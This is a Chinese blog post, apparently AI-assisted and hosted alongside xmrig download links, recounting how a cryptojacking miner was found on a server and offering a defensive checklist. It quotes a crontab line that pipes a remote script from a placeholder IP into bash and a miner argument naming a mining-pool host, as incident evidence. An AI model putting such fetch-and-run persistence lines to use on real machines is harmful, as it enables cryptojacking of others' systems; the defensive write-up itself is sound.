风扇狂转、电费翻倍:6 个步骤彻底排查算力劫持(挖矿木马防护手记)
风扇狂转、电费翻倍6 个步骤彻底排查算力劫持挖矿木马防护手记【免费下载链接】xmrigRandomX, KawPow, CryptoNight and GhostRider unified CPU/GPU miner and RandomX benchmark项目地址: https://gitcode.com/GitHub_Trending/xm/xmrig这篇文章记录了一次真实的算力劫持排查手记——我的服务器在一夜之间被恶意挖矿程序盯上CPU 被占满、电费翻倍。如果你也遇到风扇狂转、服务器 CPU 占用过高却找不到原因的情况照着文末那份 10 分钟清单走一遍大概率能把可疑进程揪出来。那个让电费多出三百块的凌晨周三凌晨 1 点我在书房改代码隔壁房间的服务器突然发出一阵嗡嗡的轰鸣——风扇像是开了狂暴模式。我以为是编译任务没太在意顺手看了一眼温度CPU 已经飙到 92℃。等到第二天查电费账单当月电费直接翻了一倍多。我这才意识到不对劲。打开终端top一刷一个叫sysupdate的进程正安静地吃掉 16 个核心占用率 1600%。它不是我装的东西我甚至没听说过这个名字。那一刻我明白——算力劫持已经在我眼皮底下发生了而且可能已经持续了好几天。先别急着重启三个常见误区很多人在这个阶段会踩坑我那次也差点杀毒软件没报警 安全—— 挖矿木马不做破坏、不删文件只是默默烧 CPU特征极淡何况它脱胎于 xmrig 这类合法开源矿工静态查杀很容易放行。重启一下就干净了—— 木马早就写好了开机自启项重启不是清除是帮它重新上线。进程杀掉就完事了—— 只杀进程、不挖源头下载脚本、自启项、入侵入口十分钟后它会卷土重来。排障手记四小时从风扇噪音到揪出真凶下面是我那天完整的排查过程按时间线记下来你可以把它当成一份现场还原01:05 确认异常先用top -o %CPU -n 1 | head -15按 CPU 占用排序确认是sysupdate长期霸榜而不是偶发尖峰。01:20 核实进程身份执行ps -ef | grep sysupdate启动参数里赫然写着--url stratumtcp://mine.fastpool-xyz.net:14444——这是典型的矿池连接参数。真凶基本锁定。01:35 定位真实文件ls -l /proc/PID/exe指向/tmp/.X11-unix/下的一个隐藏目录。正常的系统服务绝不会藏在临时目录里这一条基本可以定罪。01:50 检查网络连接用ss -tunap | grep 14444看到一个与境外 IP 的稳定长连接端口 14444 并非常见服务端口而是矿池常用端口之一。02:10 排查持久化依次检查crontab -l、/etc/crontab、/etc/cron.d/、systemctl list-units和~/.bashrc果然在 crontab 里发现一个每 5 分钟执行一次的下载脚本*/5 * * * * curl -s http://x.x.x.x/a.sh | bash02:40 回溯入侵路径翻/var/log/auth.log找到大量来自同一 IP 的 SSH 爆破成功记录——根因是这台服务器的 root 密码太弱被撞库拿下了。03:00 彻底清除杀掉进程、删除临时目录里的木马文件、清掉 crontab 和脚本、更换高强度密码、关闭 root 远程登录再手动重启确认不再复发。顺便说一句这类木马大多脱胎于 xmrig 等开源矿工——它本身是合法工具支持 RandomX、KawPow、CryptoNight、GhostRider 等算法但恶意变种会把它改得面目全非。想从源码层面认识正版行为特征的读者可以git clone https://gitcode.com/GitHub_Trending/xm/xmrig到本地对照它的默认配置和命令行参数。拿正版和木马放一起特征差异其实很明显对比项正版 xmrig恶意变种配置文件完整、可读、可配置删掉或强行加密日志输出默认开启可追溯静默无日志HTTP API可按需开启强制关闭线程控制可限制最大使用率吃满所有核心文件位置用户指定目录临时目录 自启项照抄即可10 分钟算力劫持自助排查清单这份清单是我后来整理成文的普通用户照着勾一遍就行看 CPUtop -o %CPU -n 1 | head -15找出常年占用多核、名字又陌生的进程画像ps -ef重点盯名字像系统进程、路径却在 /tmp、/dev/shm的可疑对象查网络ss -tunap | grep -E :14444|:18888|:45560定位指向境外 IP 的异常长连接清自启检查crontab -l、/etc/cron.d/、systemd 服务、~/.bashrc、/etc/ld.so.preload看登录grep -i accepted /var/log/auth.log或lastb找陌生 IP 的成功登录记录收尾双保险杀软全盘扫一遍同时检查 22、6379 等端口是否暴露在公网防大于治让恶意挖矿程序进不来的五个日常习惯排查一次很累但更值钱的是让它下次进不来最小权限别用 root 跑应用和服务权限越少损失越小密钥登录SSH 禁用密码登录、只留密钥再加一层 fail2ban 封禁暴力破解收敛端口防火墙只放行必要端口矿池常用的 14444 这类端口一律不进不出设告警给 CPU 设置阈值如持续 80% 以上 5 分钟就推送让异常在第一时间暴露勤升级勤备份系统和软件保持最新重要数据做 3-2-1 备份答疑时间挖矿木马防护高频 4 问Q1中了挖矿木马要不要重装系统如果只发现一个可疑进程、自启项也干净清干净后观察一周即可但若发现/etc/ld.so.preload被改、有 rootkit 痕迹或根本说不清来源重装最省心。Q2重装系统后还会复发吗会。入侵入口弱口令、未授权服务没堵上或者内网其他机器也中招了几分钟内就会再次沦陷。重装后的第一件事是加固而不是急着部署业务。Q3为什么杀毒软件没报警挖矿木马只烧 CPU不搞破坏行为特征不明显而且基于 xmrig 这类开源项目的变种很容易绕过静态特征库。Q4被挖走的算力能追回来吗基本追不回。重点是止损加取证保留日志、记下矿池地址和钱包地址交给企业安全团队或网安部门。写在最后一次排查终身受益算力劫持不可怕可怕的是重启一下就好了的侥幸心理。掌握上面 6 个步骤你也能在十分钟内完成一次完整的挖矿木马防护排查把藏在暗处的电费吸血鬼彻底赶出去。下期预告如何用不到五块钱的成本在风扇狂转的那一刻就收到微信告警——手把手教你搭一套零依赖的 CPU 异常监控。【免费下载链接】xmrigRandomX, KawPow, CryptoNight and GhostRider unified CPU/GPU miner and RandomX benchmark项目地址: https://gitcode.com/GitHub_Trending/xm/xmrig创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考